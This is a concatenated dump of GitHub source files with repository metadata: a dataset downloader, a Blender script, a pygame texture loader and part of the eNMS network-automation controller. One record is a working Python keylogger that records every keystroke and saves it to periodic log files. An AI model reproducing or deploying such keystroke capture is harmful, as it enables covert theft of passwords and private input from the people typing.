os.getcwd()\r\ndataset_url = 'https://cvml.ist.ac.at/AwA2/AwA2-data.zip'\r\nfile_name = 'AwA2-data.zip'\r\n\r\n#This API is used to create a temporary directory in the /tmp/ folder in linux\r\n#This way the dataset is automatically deleted upon restart\r\ndef createDirectory():\r\n\r\n file_name = 'AwA2-data.zip'\r\n check_data_path = temp_Directory+file_name\r\n #Check if the dataset is available in the given path above\r\n if os.path.isfile(check_data_path):\r\n print(\"Dataset \" + check_data_path + \" already exists!\\n\")\r\n return True\r\n #If not, create the folder\r\n else:\r\n print(\"Dataset \" +check_data_path+ \" does not exist. Checking if folder exists...\\n\")\r\n #check if the directory has been created. Ignore if it has already been created\r\n if(os.path.isdir(temp_Directory)):\r\n print(\"Path already exists. No need to create directory\\n\")\r\n return False\r\n else:\r\n #Create the directory\r\n print(\"Path\" + temp_Directory + \"does not exist. Creating now... \\n\")\r\n try:\r\n os.makedirs(temp_Directory)\r\n except OSError:\r\n print (\"Creation of the directory %s failed : \\n\" % temp_Directory)\r\n else:\r\n print (\"Successfully created the directory %s: \\n\" % temp_Directory)\r\n return False\r\n \r\n#This API is use to download the dataset\r\n#IF the dataset already exists, there is no need to actually download the dataset\r\ndef DloadDataset():\r\n data_file = temp_Directory+file_name\r\n print(\"Downloading dataset from source. Path: \"+data_file+\"\\n\\n\")\r\n r = requests.get(dataset_url, allow_redirects = True)\r\n #Downloading the file to the path created in createDirectory()\r\n \r\n with open(data_file, 'wb') as file: \r\n file.write(r.content)\r\n\r\n print(\"Dataset files downloaded from source.. \\n\\n\")\r\n \r\ndef unzipDataset():\r\n zip_dir = temp_Directory+file_name\r\n with ZipFile(zip_dir, 'r') as zip:\r\n for member in zip.namelist():\r\n checkdir = temp_Directory+member\r\n if os.path.exists(checkdir) or os.path.isfile(checkdir):\r\n print (\"Error \",member,\" exists\")\r\n else:\r\n zip.extract(member, path=temp_Directory)\r\n print(\"Extracting\", member,\"here\")\r\n\r\ndef deleteDirectory():\r\n deleteDirectory = \"/temp_test\"\r\n delete_Directory_Path = os.getcwd() + deleteDirectory\r\n deletePath = delete_Directory_Path\r\n try:\r\n os.remove(deleteDirectory)\r\n except OSError:\r\n print (\"Deletion of the directory %s failed :\\n\" % deleteDirectory)\r\n else:\r\n print (\"Successfully deleted the directory %s : \\n\" % deleteDirectory)\r\n \r\ndef main(): \r\n '''temp_Directory = \"/temp_test/data/\"\r\n parent_Directory = os.getcwd()\r\n \r\n dataset_url = 'https://cvml.ist.ac.at/AwA2/AwA2-base.zip'\r\n file_name = dataset_url.split('/')[-1]\r\n '''\r\n print(\"Downloading and Preparing Dataset for Zero Shot Leaning .. 
..\\n\\n\")\r\n \r\n if not createDirectory():\r\n DloadDataset()\r\n \r\n unzipDataset()\r\n #deleteDirectory()\r\n\r\nif __name__ == \"__main__\": \r\n main() ", "repo_name": "aranganath/zslearning", "sub_path": "prepare_dataset.py", "file_name": "prepare_dataset.py", "file_ext": "py", "file_size_in_byte": 3374, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.getcwd", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 33, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 45, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 58, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 66, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "8632434474", "text": "import keyboard\nfrom datetime import datetime\nfrom threading import Timer\n\nSAVE_REPORT_INTERVAL = 60 # seconds\n\nclass Keylogger:\n def __init__(self, interval):\n self.interval = interval\n self.log = \"\"\n self.start_dt = datetime.now()\n self.end_dt = datetime.now()\n \n def callback(self, event):\n \"\"\"\n Called whenever a keyboard event occurs\n \"\"\"\n name = event.name\n if len(name) > 1:\n if name == \"space\":\n name = \" \"\n elif name == \"enter\":\n name = \"[ENTER]\\n\"\n elif name == \"decimal\":\n name = \".\"\n else:\n name = f'[{name.upper()}]'\n\n self.log += name\n\n def update_filename(self):\n start_dt_str = str(self.start_dt)[:-7].replace(\" \", \"-\").replace(\":\", \"\")\n end_dt_str = str(self.end_dt)[:-7].replace(\" \", \"-\").replace(\":\", \"\")\n self.filename = f\"keylog-{start_dt_str}_{end_dt_str}\"\n \n def report_to_file(self):\n with open(f'./logs/{self.filename}.txt', 'w') as f:\n # Write the keylogs to the file\n print(self.log, file=f)\n print(f'Saved most recent keylogs to: {self.filename}.txt')\n\n def report(self):\n if self.log:\n self.end_dt = datetime.now()\n self.update_filename()\n self.report_to_file()\n self.start_dt = datetime.now()\n self.log = ''\n timer = Timer(interval=self.interval, function=self.report)\n timer.daemon = True\n timer.start()\n\n def start(self):\n self.start_dt = datetime.now()\n keyboard.on_release(callback=self.callback)\n self.report()\n keyboard.wait()\n\nif __name__ == '__main__':\n keylogger = Keylogger(interval=SAVE_REPORT_INTERVAL)\n keylogger.start()", "repo_name": "JackWinterburn/Keylogger", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1831, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "datetime.datetime.now", "line_number": 11, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 11, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "name"}, {"api_name": 
"datetime.datetime.now", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 44, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 47, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 47, "usage_type": "name"}, {"api_name": "threading.Timer", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 54, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 54, "usage_type": "name"}, {"api_name": "keyboard.on_release", "line_number": 55, "usage_type": "call"}, {"api_name": "keyboard.wait", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "36047626139", "text": "import numpy as np\nimport bpy\n\ncortexAndCerebellumStr = \"out\" # This is the name of the cortex + cerebellum object\noutput_full_path = '/media/ohadfel/Elements/Abeles/blender_lookup_table.npy'\n\ntotal_num_of_verts = len(bpy.data.objects[cortexAndCerebellumStr].data.vertices)\nlookup_table = np.ones((total_num_of_verts, 20), dtype=np.int)*-1\nlast_inds = np.zeros((total_num_of_verts, 1), dtype=np.int)\n\nmesh = bpy.data.objects['out'].data\nfor poly in mesh.polygons:\n for loop_index in poly.loop_indices:\n loop_vert_index = mesh.loops[loop_index].vertex_index\n lookup_table[loop_vert_index, last_inds[loop_vert_index]] = loop_index\n last_inds[loop_vert_index] += 1\nprint('FINISH!!!')\nnp.save(output_full_path, lookup_table)\n", "repo_name": "ohadfel/Blender-Abeles-Lab", "sub_path": "create_vert_face_lookup_table.py", "file_name": "create_vert_face_lookup_table.py", "file_ext": "py", "file_size_in_byte": 747, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "bpy.data", "line_number": 7, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 8, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 9, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 11, "usage_type": "attribute"}, {"api_name": "numpy.save", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "21160881000", "text": "import pygame\nimport moderngl\n\nclass Texture:\n def __init__(self, ctx) -> None:\n self.ctx = ctx\n self.textures = {}\n self.textures[0] = self.get_texture(path='./textures/test.png')\n self.textures[1] = self.get_texture(path='./textures/img1.png')\n self.textures[2] = self.get_texture(path='./textures/img2.png')\n self.textures[3] = self.get_texture(path='./textures/img3.png')\n\n\n def get_texture(self, path):\n texture = pygame.image.load(path).convert()\n texture = pygame.transform.flip(texture, flip_x=False, flip_y=True)\n texture = self.ctx.texture(size=texture.get_size(),\n components = 3,\n data = pygame.image.tostring(texture, 'RGB'))\n \n texture.filter = (moderngl.LINEAR_MIPMAP_LINEAR, moderngl.LINEAR)\n texture.build_mipmaps()\n \n return texture\n \n def destroy(self):\n [tex.release for tex in self.textures.values()]\n", "repo_name": "MrBlueBlobGuy/Blue-Engine", "sub_path": "blueEngine/texture.py", "file_name": "texture.py", "file_ext": "py", "file_size_in_byte": 1007, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.image.load", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 15, "usage_type": 
"attribute"}, {"api_name": "pygame.transform.flip", "line_number": 16, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pygame.image.tostring", "line_number": 19, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 19, "usage_type": "attribute"}, {"api_name": "moderngl.LINEAR_MIPMAP_LINEAR", "line_number": 21, "usage_type": "attribute"}, {"api_name": "moderngl.LINEAR", "line_number": 21, "usage_type": "attribute"}]} +{"seq_id": "37884349976", "text": "from collections import Counter, defaultdict\nfrom contextlib import redirect_stdout\nfrom datetime import datetime\nfrom difflib import unified_diff\nfrom dramatiq import actor\nfrom flask_login import current_user\nfrom functools import wraps\nfrom git import Repo\nfrom io import BytesIO, StringIO\nfrom ipaddress import IPv4Network\nfrom json import dump, load\nfrom logging import info\nfrom operator import attrgetter, itemgetter\nfrom os import getenv, listdir, makedirs, scandir\nfrom os.path import exists\nfrom pathlib import Path\nfrom re import search, sub\nfrom requests import get as http_get\nfrom ruamel import yaml\nfrom shutil import rmtree\nfrom sqlalchemy import and_, cast, or_, String\nfrom sqlalchemy.exc import IntegrityError, OperationalError\nfrom sqlalchemy.orm import aliased\nfrom sqlalchemy.sql.expression import true\nfrom subprocess import Popen\nfrom tarfile import open as open_tar\nfrom threading import current_thread, Thread\nfrom traceback import format_exc\nfrom uuid import uuid4\nfrom xlrd import open_workbook\nfrom xlrd.biffh import XLRDError\nfrom xlwt import Workbook\n\nfrom eNMS.database import db\nfrom eNMS.forms import form_factory\nfrom eNMS.environment import env\nfrom eNMS.variables import vs\n\n\nclass Controller:\n def _initialize(self, first_init):\n if not first_init:\n return\n self.migration_import(\n name=vs.settings[\"app\"].get(\"startup_migration\", \"default\"),\n import_export_types=db.import_export_models,\n )\n self.get_git_content(force_update=True)\n self.scan_folder()\n\n def _register_endpoint(self, func):\n setattr(self, func.__name__, func)\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n return func(*args, **kwargs)\n\n return wrapper\n\n def add_edge(self, workflow_id, subtype, source, destination):\n workflow = db.fetch(\"workflow\", id=workflow_id, rbac=\"edit\")\n workflow_edge = self.update(\n \"workflow_edge\",\n rbac=None,\n **{\n \"name\": vs.get_time(),\n \"workflow\": workflow_id,\n \"subtype\": subtype,\n \"source\": source,\n \"destination\": destination,\n },\n )\n workflow.update_last_modified_properties()\n db.session.commit()\n return {\"update_time\": workflow.last_modified, **workflow_edge}\n\n def add_instances_in_bulk(self, **kwargs):\n target = db.fetch(kwargs[\"relation_type\"], id=kwargs[\"relation_id\"])\n if target.type == \"pool\" and not target.manually_defined:\n return {\"alert\": \"Adding objects to a dynamic pool is not allowed.\"}\n model, property = kwargs[\"model\"], kwargs[\"property\"]\n instances = set(db.objectify(model, kwargs[\"instances\"]))\n if kwargs[\"names\"]:\n for name in [instance.strip() for instance in kwargs[\"names\"].split(\",\")]:\n instance = db.fetch(model, allow_none=True, name=name)\n if not instance:\n return {\"alert\": f\"{model.capitalize()} '{name}' does not exist.\"}\n instances.add(instance)\n instances = instances - set(getattr(target, property))\n for instance in instances:\n getattr(target, property).append(instance)\n 
target.last_modified = vs.get_time()\n target.last_modified_by = current_user.name\n return {\"number\": len(instances), \"target\": target.base_properties}\n\n def add_objects_to_network(self, network_id, **kwargs):\n network = db.fetch(\"network\", id=network_id)\n result = {\"nodes\": [], \"links\": []}\n nodes = set(db.objectify(\"node\", kwargs[\"nodes\"]))\n links = set(db.objectify(\"link\", kwargs[\"links\"]))\n for pool in db.objectify(\"pool\", kwargs[\"pools\"]):\n nodes |= set(pool.devices)\n links |= set(pool.links)\n if kwargs[\"add_connected_nodes\"]:\n for link in links:\n nodes |= {link.source, link.destination}\n if kwargs[\"add_connected_links\"]:\n for node in nodes:\n links |= set(node.get_neighbors(\"link\"))\n for node in nodes:\n if not node or node in network.nodes or node == network:\n continue\n result[\"nodes\"].append(node.serialized)\n network.nodes.append(node)\n for link in links:\n if link in network.links:\n continue\n if (\n link.source not in network.nodes\n or link.destination not in network.nodes\n ):\n continue\n result[\"links\"].append(link.serialized)\n network.links.append(link)\n return result\n\n def bulk_deletion(self, table, **kwargs):\n instances = self.filtering(table, properties=[\"id\"], **kwargs)\n for instance in instances:\n db.delete(table, id=instance.id)\n return len(instances)\n\n def bulk_edit(self, table, **kwargs):\n instances = kwargs.pop(\"id\").split(\"-\")\n for instance_id in instances:\n instance = db.factory(table, id=instance_id)\n for property, value in kwargs.items():\n if not kwargs.get(f\"bulk-edit-{property}\"):\n continue\n edit_mode = kwargs.get(f\"{property}-edit-mode\")\n if not edit_mode:\n setattr(instance, property, value)\n else:\n current_value = getattr(instance, property)\n related_model = vs.relationships[table][property][\"model\"]\n objects = db.objectify(related_model, value)\n if edit_mode == \"set\":\n setattr(instance, property, objects)\n else:\n for obj in objects:\n if edit_mode == \"append\" and obj not in current_value:\n current_value.append(obj)\n elif edit_mode == \"remove\" and obj in current_value:\n current_value.remove(obj)\n return len(instances)\n\n def bulk_removal(\n self,\n table,\n target_type,\n target_id,\n target_property,\n **kwargs,\n ):\n target = db.fetch(target_type, id=target_id)\n if target.type == \"pool\" and not target.manually_defined:\n return {\"alert\": \"Removing objects from a dynamic pool is an allowed.\"}\n instances = self.filtering(table, bulk=\"object\", **kwargs)\n for instance in instances:\n getattr(target, target_property).remove(instance)\n return len(instances)\n\n def calendar_init(self, type):\n results, properties = {}, [\"id\", \"name\", \"runtime\", \"service_properties\"]\n for instance in db.fetch_all(type):\n if getattr(instance, \"workflow\", None):\n continue\n date = getattr(instance, \"next_run_time\" if type == \"task\" else \"runtime\")\n python_month = search(r\".*-(\\d{2})-.*\", date)\n if not python_month:\n continue\n month = \"{:02}\".format((int(python_month.group(1)) - 1) % 12)\n start = [\n int(i)\n for i in sub(\n r\"(\\d+)-(\\d+)-(\\d+) (\\d+):(\\d+).*\",\n r\"\\1,\" + month + r\",\\3,\\4,\\5\",\n date,\n ).split(\",\")\n ]\n instance_properties = instance.get_properties(include=properties)\n results[instance.name] = {\"start\": start, **instance_properties}\n return results\n\n def clear_results(self, service_id):\n for result in db.fetch(\n \"run\", all_matches=True, allow_none=True, service_id=service_id\n ):\n 
db.session.delete(result)\n\n def compare(self, type, id, v1, v2, context_lines):\n if type in (\"result\", \"device_result\"):\n first = vs.dict_to_string(getattr(db.fetch(\"result\", id=v1), \"result\"))\n second = vs.dict_to_string(getattr(db.fetch(\"result\", id=v2), \"result\"))\n else:\n device = db.fetch(\"device\", id=id)\n result1 = self.get_git_network_data(device.name, v1)\n result2 = self.get_git_network_data(device.name, v2)\n v1, v2 = result1[\"datetime\"], result2[\"datetime\"]\n first, second = result1[\"result\"][type], result2[\"result\"][type]\n return \"\\n\".join(\n unified_diff(\n first.splitlines(),\n second.splitlines(),\n fromfile=f\"V1 ({v1})\",\n tofile=f\"V2 ({v2})\",\n lineterm=\"\",\n n=int(context_lines),\n )\n )\n\n def copy_service_in_workflow(self, workflow_id, **kwargs):\n service_sets = list(set(kwargs[\"services\"].split(\",\")))\n service_instances = db.objectify(\"service\", service_sets)\n workflow = db.fetch(\"workflow\", id=workflow_id, rbac=\"edit\")\n services, errors, shallow_copy = [], [], kwargs[\"mode\"] == \"shallow\"\n for service in service_instances:\n if shallow_copy and not service.shared:\n errors.append(f\"'{service.name}' is not a shared service.\")\n elif shallow_copy and service in workflow.services:\n errors.append(f\"This workflow already contains '{service.name}'.\")\n elif service.scoped_name == \"Placeholder\" and not shallow_copy:\n errors.append(\"Deep Copy cannot be used for the placeholder service.\")\n if errors:\n return {\"alert\": errors}\n for service in service_instances:\n if kwargs[\"mode\"] == \"deep\":\n service = service.duplicate(workflow)\n else:\n workflow.services.append(service)\n services.append(service)\n workflow.update_last_modified_properties()\n db.session.commit()\n return {\n \"services\": [service.serialized for service in services],\n \"update_time\": workflow.last_modified,\n }\n\n def count_models(self):\n active_service, active_workflow = 0, 0\n for run in db.fetch_all(\"run\", rbac=None, status=\"Running\"):\n active_service += 1\n active_workflow += run.service.type == \"workflow\"\n return {\n \"counters\": {\n model: db.query(model, rbac=None)\n .with_entities(vs.models[model].id)\n .count()\n for model in vs.properties[\"dashboard\"]\n },\n \"active\": {\n \"service\": active_service,\n \"task\": len(db.fetch_all(\"task\", rbac=None, is_active=True)),\n \"workflow\": active_workflow,\n },\n \"properties\": {\n model: self.counters(vs.properties[\"dashboard\"][model][0], model)\n for model in vs.properties[\"dashboard\"]\n },\n }\n\n def counters(self, property, model):\n return Counter(v for v, in db.query(model, properties=[property], rbac=None))\n\n def create_label(self, type, id, x, y, label_id, **kwargs):\n workflow = db.fetch(type, id=id, rbac=\"edit\")\n label_id = str(uuid4()) if label_id == \"undefined\" else label_id\n label = {\n \"positions\": [x, y],\n \"content\": kwargs[\"text\"],\n \"alignment\": kwargs[\"alignment\"],\n \"size\": kwargs[\"size\"],\n }\n workflow.labels[label_id] = label\n return {\"id\": label_id, **label}\n\n def database_deletion(self, **kwargs):\n db.delete_all(*kwargs[\"deletion_types\"])\n\n def delete_instance(self, model, instance_id):\n try:\n return db.delete(model, id=instance_id)\n except Exception as exc:\n return {\"alert\": f\"Unable to delete {model} ({exc})\"}\n\n def delete_builder_selection(self, type, id, **selection):\n instance = db.fetch(type, id=id)\n instance.update_last_modified_properties()\n 
instance.check_restriction_to_owners(\"edit\")\n for edge_id in selection[\"edges\"]:\n if type == \"workflow\":\n db.delete(\"workflow_edge\", id=edge_id)\n else:\n instance.links.remove(db.fetch(\"link\", id=edge_id))\n for node_id in selection[\"nodes\"]:\n if isinstance(node_id, str):\n instance.labels.pop(node_id)\n elif type == \"network\":\n instance.nodes.remove(db.fetch(\"node\", id=node_id))\n else:\n service = db.fetch(\"service\", rbac=\"edit\", id=node_id)\n if not service.shared:\n db.delete_instance(service)\n else:\n instance.services.remove(service)\n return instance.last_modified\n\n def edit_file(self, filepath):\n scoped_path = filepath.replace(\">\", \"/\")\n try:\n with open(f\"{vs.file_path}{scoped_path}\") as file:\n return file.read()\n except FileNotFoundError:\n file = db.fetch(\"file\", path=scoped_path, allow_none=True)\n if file:\n file.status = \"Not Found\"\n return {\"error\": \"File not found on disk.\"}\n except UnicodeDecodeError:\n return {\"error\": \"Cannot read file (unsupported type).\"}\n\n def export_service(self, service_id):\n service = db.fetch(\"service\", id=service_id)\n path = Path(vs.path / \"files\" / \"services\" / service.filename)\n path.mkdir(parents=True, exist_ok=True)\n services = (\n set(service.deep_services) if service.type == \"workflow\" else [service]\n )\n exclude = (\"target_devices\", \"target_pools\", \"pools\", \"events\")\n services = [\n service.to_dict(export=True, private_properties=True, exclude=exclude)\n for service in services\n ]\n with open(path / \"service.yaml\", \"w\") as file:\n yaml.dump(services, file, default_style='\"')\n if service.type == \"workflow\":\n edges = [edge.to_dict(export=True) for edge in service.deep_edges]\n with open(path / \"workflow_edge.yaml\", \"w\") as file:\n yaml.dump(edges, file, default_style='\"')\n with open(path / \"metadata.yaml\", \"w\") as file:\n metadata = {\n \"version\": vs.server_version,\n \"export_time\": datetime.now(),\n \"service\": service.name,\n }\n yaml.dump(metadata, file)\n with open_tar(f\"{path}.tgz\", \"w:gz\") as tar:\n tar.add(path, arcname=service.filename)\n rmtree(path, ignore_errors=True)\n return path\n\n def export_services(self, **kwargs):\n if kwargs[\"parent-filtering\"] == \"true\":\n kwargs[\"workflows_filter\"] = \"empty\"\n for service in self.filtering(\"service\", properties=[\"id\"], form=kwargs):\n self.export_service(service.id)\n\n def filtering_base_constraints(self, model, **kwargs):\n table, constraints = vs.models[model], []\n constraint_dict = {**kwargs.get(\"form\", {}), **kwargs.get(\"constraints\", {})}\n for property in vs.model_properties[model]:\n value, row = constraint_dict.get(property), getattr(table, property)\n filter_value = constraint_dict.get(f\"{property}_filter\")\n if not value and filter_value != \"empty\":\n continue\n if value in (\"bool-true\", \"bool-false\"):\n constraint = row == (value == \"bool-true\")\n elif filter_value == \"equality\":\n constraint = row == value\n elif filter_value == \"empty\":\n constraint = row == \"\"\n elif not filter_value or filter_value == \"inclusion\":\n constraint = row.contains(value, autoescape=isinstance(value, str))\n else:\n constraint = cast(row, String()).regexp_match(value)\n if constraint_dict.get(f\"{property}_invert\"):\n constraint = ~constraint\n constraints.append(constraint)\n return constraints\n\n def filtering_relationship_constraints(self, query, model, **kwargs):\n table = vs.models[model]\n constraint_dict = {**kwargs.get(\"form\", {}), 
**kwargs.get(\"constraints\", {})}\n for related_model, relation_properties in vs.relationships[model].items():\n related_table = aliased(vs.models[relation_properties[\"model\"]])\n match = constraint_dict.get(f\"{related_model}_filter\")\n if match == \"empty\":\n query = query.filter(~getattr(table, related_model).any())\n else:\n relation_names = constraint_dict.get(related_model, [])\n if not relation_names:\n continue\n if match == \"union\":\n query = (\n query.join(related_table, getattr(table, related_model))\n .filter(related_table.name.in_(relation_names))\n .group_by(table.id)\n )\n else:\n for name in relation_names:\n new_table = aliased(vs.models[relation_properties[\"model\"]])\n query = query.join(\n new_table, getattr(table, related_model)\n ).filter(new_table.name == name)\n if constraint_dict.get(\"intersect\"):\n intersect_model = constraint_dict[\"intersect\"][\"type\"]\n intersect_table = aliased(vs.models[intersect_model])\n query = query.join(\n intersect_table, getattr(table, f\"{intersect_model}s\")\n ).filter(intersect_table.id == constraint_dict[\"intersect\"][\"id\"])\n return query\n\n def filtering(\n self, model, bulk=False, rbac=\"read\", username=None, properties=None, **kwargs\n ):\n table, pagination = vs.models[model], kwargs.get(\"pagination\")\n query = db.query(model, rbac, username, properties=properties)\n total_records, filtered_records = (10**6,) * 2\n if pagination and not bulk and not properties:\n total_records = query.with_entities(table.id).count()\n constraints = self.filtering_base_constraints(model, **kwargs)\n constraints.extend(table.filtering_constraints(**kwargs))\n query = self.filtering_relationship_constraints(query, model, **kwargs)\n query = query.filter(and_(*constraints))\n if bulk or properties:\n instances = query.all()\n if bulk == \"object\" or properties:\n return instances\n else:\n return [getattr(instance, bulk) for instance in instances]\n if pagination:\n filtered_records = query.with_entities(table.id).count()\n data = kwargs[\"columns\"][int(kwargs[\"order\"][0][\"column\"])][\"data\"]\n ordering = getattr(getattr(table, data, None), kwargs[\"order\"][0][\"dir\"], None)\n if ordering:\n query = query.order_by(ordering())\n try:\n query_data = (\n query.limit(int(kwargs[\"length\"])).offset(int(kwargs[\"start\"])).all()\n )\n except OperationalError:\n return {\"error\": \"Invalid regular expression as search parameter.\"}\n table_result = {\n \"draw\": int(kwargs[\"draw\"]),\n \"recordsTotal\": total_records,\n \"recordsFiltered\": filtered_records,\n \"data\": [obj.table_properties(**kwargs) for obj in query_data],\n }\n if kwargs.get(\"export\"):\n table_result[\"full_result\"] = [\n obj.table_properties(**kwargs) for obj in query.all()\n ]\n if kwargs.get(\"clipboard\"):\n table_result[\"full_result\"] = \",\".join(obj.name for obj in query.all())\n return table_result\n\n def get(self, model, id, **kwargs):\n if not kwargs:\n get_model = (\n \"service\" if model == \"workflow\" or \"service\" in model else model\n )\n kwargs = vs.properties[\"serialized\"][\"get\"].get(get_model, {})\n func = \"get_properties\" if kwargs.pop(\"properties_only\", None) else \"to_dict\"\n return getattr(db.fetch(model, id=id), func)(**kwargs)\n\n def get_cluster_status(self):\n return [server.status for server in db.fetch_all(\"server\")]\n\n def get_credentials(self, device, optional=False, **kwargs):\n if kwargs[\"credentials\"] == \"device\":\n credentials = db.get_credential(\n current_user.name, device=device, 
optional=optional\n )\n if not credentials:\n return\n return credentials.username, env.get_password(credentials.password)\n else:\n return kwargs[\"username\"], kwargs[\"password\"]\n\n def get_device_logs(self, device_id):\n device_logs = [\n log.name\n for log in db.fetch_all(\"log\")\n if log.source == db.fetch(\"device\", id=device_id).ip_address\n ]\n return \"\\n\".join(device_logs)\n\n def get_device_network_data(self, device_id):\n device = db.fetch(\"device\", id=device_id, rbac=\"configuration\")\n return {\n property: vs.custom.parse_configuration_property(device, property)\n for property in vs.configuration_properties\n }\n\n def get_form_properties(self, service_id):\n form_factory.register_parameterized_form(service_id)\n return vs.form_properties[f\"initial-{service_id}\"]\n\n def get_git_content(self, force_update=False):\n env.log(\"info\", \"Starting Git Content Update\")\n repo = vs.settings[\"app\"][\"git_repository\"]\n if not repo:\n return\n local_path = vs.path / \"network_data\"\n try:\n if exists(local_path):\n Repo(local_path).remotes.origin.pull()\n else:\n local_path.mkdir(parents=True, exist_ok=True)\n Repo.clone_from(repo, local_path)\n except Exception as exc:\n env.log(\"error\", f\"Git pull failed ({str(exc)})\")\n try:\n self.update_database_configurations_from_git(force_update)\n except Exception as exc:\n env.log(\"error\", f\"Update of device configurations failed ({str(exc)})\")\n env.log(\"info\", \"Git Content Update Successful\")\n\n def get_git_history(self, device_id):\n device = db.fetch(\"device\", id=device_id, rbac=\"configuration\")\n repo = Repo(vs.path / \"network_data\")\n path = vs.path / \"network_data\" / device.name\n return {\n data_type: [\n {\"hash\": str(commit), \"date\": commit.committed_datetime}\n for commit in list(repo.iter_commits(paths=path / data_type))\n ]\n for data_type in vs.configuration_properties\n }\n\n def get_git_network_data(self, device_name, hash):\n commit, result = Repo(vs.path / \"network_data\").commit(hash), {}\n device = db.fetch(\"device\", name=device_name, rbac=\"configuration\")\n for property in vs.configuration_properties:\n try:\n file = commit.tree / device_name / property\n with BytesIO(file.data_stream.read()) as f:\n value = f.read().decode(\"utf-8\")\n result[property] = vs.custom.parse_configuration_property(\n device, property, value\n )\n except KeyError:\n result[property] = \"\"\n return {\"result\": result, \"datetime\": commit.committed_datetime}\n\n def get_migration_folders(self):\n return listdir(Path(vs.migration_path))\n\n def get_properties(self, model, id):\n return db.fetch(model, id=id).get_properties()\n\n def get_report(self, service_id, runtime):\n return getattr(\n db.fetch(\n \"service_report\",\n allow_none=True,\n runtime=runtime,\n service_id=service_id,\n ),\n \"content\",\n \"\",\n )\n\n def get_report_template(self, template):\n return vs.reports[template]\n\n def get_result(self, id):\n return db.fetch(\"result\", id=id).result\n\n def get_runtimes(self, id, display=None):\n service_alias = aliased(vs.models[\"service\"])\n query = (\n db.query(\"run\", properties=[\"runtime\"])\n .join(service_alias, vs.models[\"run\"].services)\n .filter(service_alias.id == id)\n )\n if display == \"user\":\n query = query.filter(vs.models[\"run\"].creator == current_user.name)\n return sorted(((run.runtime, run.runtime) for run in query.all()), reverse=True)\n\n def get_service_logs(self, service, runtime, line=0, device=None):\n log_instance = db.fetch(\n \"service_log\", 
allow_none=True, runtime=runtime, service_id=service\n )\n number_of_lines = 0\n if log_instance:\n lines = log_instance.content.splitlines()\n else:\n lines = (\n env.log_queue(runtime, service, start_line=int(line), mode=\"get\") or []\n )\n number_of_lines = len(lines)\n if device:\n device_name = db.fetch(\"device\", id=device).name\n lines = [line for line in lines if f\"DEVICE {device_name}\" in line]\n return {\n \"logs\": \"\\n\".join(lines),\n \"refresh\": not log_instance,\n \"line\": int(line) + number_of_lines,\n }\n\n def get_service_state(self, path, **kwargs):\n state, run, path_id = None, None, path.split(\">\")\n runtime, display = kwargs.get(\"runtime\"), kwargs.get(\"display\")\n output = {\"runtime\": runtime}\n service = db.fetch(\"service\", id=path_id[-1], allow_none=True)\n if not service:\n raise db.rbac_error\n runs = db.query(\"run\", rbac=None).filter(\n vs.models[\"run\"].service_id.in_(path_id)\n )\n if display == \"user\":\n runs = runs.filter(vs.models[\"run\"].creator == current_user.name)\n runs = runs.all()\n if runtime != \"normal\" and runs:\n if runtime == \"latest\":\n run = sorted(runs, key=attrgetter(\"runtime\"), reverse=True)[0]\n else:\n run = db.fetch(\"run\", allow_none=True, runtime=runtime)\n state = run.get_state() if run else None\n if kwargs.get(\"device\") and run:\n output[\"device_state\"] = {\n result.service_id: result.success\n for result in db.fetch_all(\n \"result\", parent_runtime=run.runtime, device_id=kwargs.get(\"device\")\n )\n }\n serialized_service = service.to_dict(include=[\"edges\", \"superworkflow\"])\n run_properties = vs.automation[\"workflow\"][\"state_properties\"][\"run\"]\n service_properties = vs.automation[\"workflow\"][\"state_properties\"][\"service\"]\n if service.type == \"workflow\":\n serialized_service[\"services\"] = []\n for subservice in service.services:\n properties = subservice.get_properties(include=service_properties)\n subservice_positions = subservice.positions.get(service.name, [0, 0])\n properties[\"x\"], properties[\"y\"] = subservice_positions\n serialized_service[\"services\"].append(properties)\n return {\n \"service\": serialized_service,\n \"runtimes\": sorted(\n set((run.runtime, run.name) for run in runs), reverse=True\n ),\n \"state\": state,\n \"run\": run.get_properties(include=run_properties) if run else None,\n **output,\n 